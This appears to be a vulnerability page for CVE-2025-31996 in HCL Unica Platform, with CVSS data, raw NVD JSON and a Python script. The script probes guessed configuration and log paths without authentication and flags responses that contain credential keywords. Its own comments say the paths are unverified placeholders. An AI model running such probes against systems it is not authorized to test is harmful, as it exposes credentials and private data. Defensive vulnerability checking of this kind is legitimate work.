Security Vulnerability Report
CVE-2025-31996 CVSS 5.3 MEDIUM

CVE-2025-31996

Published: 2025-10-13 04:15:56
Last Modified: 2025-10-21 14:55:23

Description

HCL Unica Platform is affected by unprotected files due to improper access controls.  These files may contain sensitive information such as private or system information that can be exploited by attackers to compromise the application, infrastructure, or users.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
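CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
Note: the raw record below carries two CVSS 3.1 assessments. The 5.3 MEDIUM shown here is the entry typed "Secondary"; the entry typed "Primary" scores 7.5 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).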

Configurations (Affected Products)

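cpe:2.3:a:hcltech:unica:*:*:*:*:*:*:*:* - VULNERABLE (the raw record below bounds this match with versionEndExcluding 25.1.0.1, i.e. releases before 25.1.0.1)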
HCL Unica Platform 12.1.0 and earlier
HCL Unica Platform 12.0.x
HCL Unica Platform 11.1.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
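# CVE-2025-31996 - HCL Unica Platform Unprotected Files PoC
# Vulnerability: Improper Access Controls leading to Information Disclosure (CWE-552)
# CVSS: 5.3 (MEDIUM) - AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
# Remediation reference: the NVD CPE data marks releases before 25.1.0.1 as
# vulnerable; see vendor advisory KB0124418.
import requests
import sys

# No built-in default host: the target must be named explicitly so that a
# bare invocation never sends requests to a system the operator did not choose.
TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else None

# Candidate paths from the original listing.
# NOTE(review): "<platform_path>" is an unfilled placeholder, and none of these
# paths is taken from the vendor advisory. A hit on one of them is a lead to
# confirm against the deployment's own file layout, not proof of CVE-2025-31996.
SENSITIVE_PATHS = [
    "/<platform_path>/logs/system.log",
    "/<platform_path>/conf/platform.properties",
    "/<platform_path>/WEB-INF/web.xml",
    "/<platform_path>/unica/WEB-INF/classes/config.properties",
    "/<platform_path>/status",
    "/<platform_path>/diagnostics/systemInfo.jsp",
    "/<platform_path>/health",
]


def check_unprotected_files(base_url):
    """Report which SENSITIVE_PATHS entries are served without authentication.

    Sends one unauthenticated GET per path (10 second timeout, redirects not
    followed) and prints one result per URL: HTTP 200 with a non-empty body,
    401/403 (protected), any other status, or a request error. Response
    bodies are never printed; only the first matching keyword is named.

    TLS certificates are verified. For a deployment that uses an internal CA,
    point the REQUESTS_CA_BUNDLE environment variable at that CA bundle
    instead of disabling verification: the responses being inspected may
    contain exactly the sensitive data this check is looking for.

    Args:
        base_url: Scheme and host of the deployment to check; a trailing
            slash is ignored.
    """
    print(f"[*] Target: {base_url}")
    print("[*] Testing for CVE-2025-31996 - Unprotected Files\n")

    sensitive_patterns = ('password', 'secret', 'key', 'token',
                          'credential', 'database', 'jdbc')
    root = base_url.rstrip('/')

    for path in SENSITIVE_PATHS:
        url = root + path
        try:
            response = requests.get(url, timeout=10, allow_redirects=False)
        except requests.exceptions.RequestException as e:
            # Includes certificate failures now that verification is on.
            print(f"[ERROR] {url}: {e}")
            continue

        status = response.status_code
        if status == 200 and response.content:
            # A 200 alone does not establish the CVE: login pages and
            # catch-all error pages also answer 200, so the finding is
            # reported as something to confirm rather than as "VULNERABLE".
            print(f"[+] POSSIBLY EXPOSED (HTTP 200, confirm manually): {url}")
            print(f" Status: {status}")
            print(f" Size: {len(response.content)} bytes")

            # Check for sensitive content patterns; name the first hit only.
            content_lower = response.text.lower()
            hit = next((p for p in sensitive_patterns if p in content_lower), None)
            if hit is not None:
                print(f" [!] Contains sensitive keyword: {hit}")
        elif status in (401, 403):
            print(f"[-] Protected: {url} (Status: {status})")
        else:
            print(f"[?] Unexpected: {url} (Status: {status})")


if __name__ == "__main__":
    if TARGET_URL is None:
        sys.exit(f"usage: {sys.argv[0]} https://<your-unica-host>")
    check_unprotected_files(TARGET_URL)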

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-31996", "sourceIdentifier": "[email protected]", "published": "2025-10-13T04:15:56.120", "lastModified": "2025-10-21T14:55:23.097", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Unica Platform is affected by unprotected files due to improper access controls.  These files may contain sensitive information such as private or system information that can be exploited by attackers to compromise the application, infrastructure, or users."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-552"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:unica:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.1.0.1", "matchCriteriaId": "B3EA8F8F-657C-42BF-8415-F787BA65B853"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124418", "source": "[email protected]", "tags": ["Vendor 
Advisory"]}]}}